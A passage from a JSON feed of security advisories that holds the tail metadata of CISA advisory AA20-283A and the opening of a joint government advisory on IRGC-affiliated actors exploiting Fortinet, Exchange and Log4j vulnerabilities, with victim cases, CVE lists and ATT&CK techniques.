Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\n[[3] Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n\n[[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 9, 2020: Initial Version|October 11, 2020: Updated Summary|October 12, 2020: Added Additional Links\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-1631", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-283A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:25:13", "description": "### Summary\n\nActions to take today to protect against ransom operations:\n\n\u2022 Keep systems and software updated and prioritize remediating [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Enforce MFA. \n\u2022 Make offline backups of your data.\n\nThis joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) - Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom\u2019s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government\u2019s Islamic Revolutionary Guard Corps (IRGC). **Note**: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as \"the authoring agencies.\"\n\nThis advisory updates joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>), which provides information on these Iranian government-sponsored APT actors exploiting known Fortinet and Microsoft Exchange vulnerabilities to gain initial access to a broad range of targeted entities in furtherance of malicious activities, including ransom operations. The authoring agencies now judge these actors are an APT group affiliated with the IRGC.\n\nSince the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report [APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity](<https://www.ic3.gov/Media/News/2021/210527.pdf>) from May 2021, the authoring agencies have continued to observe these IRGC-affiliated actors exploiting known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities for initial access. The IRGC-affiliated actors have used this access for follow-on activity, including disk encryption and data extortion, to support ransom operations.\n\nThe IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors as well as Australian, Canadian, and United Kingdom organizations. These actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran. The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific targeted entities or sectors.\n\nThis advisory provides observed tactics, techniques, and indicators of compromise (IOCs) that the authoring agencies assess are likely associated with this IRGC-affiliated APT. The authoring agencies urge organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.\n\nFor a downloadable copy of IOCs, see [AA22-257A.stix](<https://www.us-cert.gov/sites/default/files/AA22-257A.stix.xml>).\n\nFor more information on Iranian state-sponsored malicious cyber activity, see CISA\u2019s [Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>) webpage and FBI\u2019s [Iran Threat](<https://www.fbi.gov/investigate/counterintelligence/the-iran-threat>) webpage.\n\nDownload the PDF version of this report: pdf, 836 kb\n\n### Technical Details\n\n#### Threat Actor Activity\n\nAs reported in joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>), the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>), [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>), and [CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>) (a ProxyShell vulnerability). The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>) and [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>). The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems. The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.\n\nSince the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) (\u201cLog4Shell\u201d), [CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>), and [CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) for initial access.\n\nThe IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or \u201cdouble extortion\u201d ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.\n\nIRGC-affiliated actor activity observed by the authoring agencies includes:\n\n * In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.\n * In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company\u2019s operations for an extended period.\n * In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.\n * In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company's network.\n\n#### MITRE ATT&amp;CK\u00ae Tactics and Techniques\n\nNote: This advisory uses the MITRE [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v11/techniques/enterprise/>) framework, version 11. See Appendix B for a table of the MITRE ATT&amp;CK tactics and techniques observed.\n\nThe authoring agencies assess the following tactics and techniques are associated with this activity.\n\n#### Resource Development [[TA0042](<https://attack.mitre.org/versions/v11/tactics/TA0042>)]\n\nThe IRGC-affiliated actors have used the following malicious and legitimate tools [[T1588.001](<https://attack.mitre.org/versions/v11/techniques/T1588/001>), [T1588.002](<https://attack.mitre.org/versions/v11/techniques/T1588/002>)] for a variety of tactics across the enterprise spectrum:\n\n * Fast Reverse Proxy (FRP) for command and control (C2)\n * Plink for C2\n * Remote Desktop Protocol (RDP) for lateral movement\n * BitLocker for data encryption\n * SoftPerfect Network Scanner for system network configuration discovery\n\nNote: For additional tools used by these IRGC-affiliated cyber actors, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fort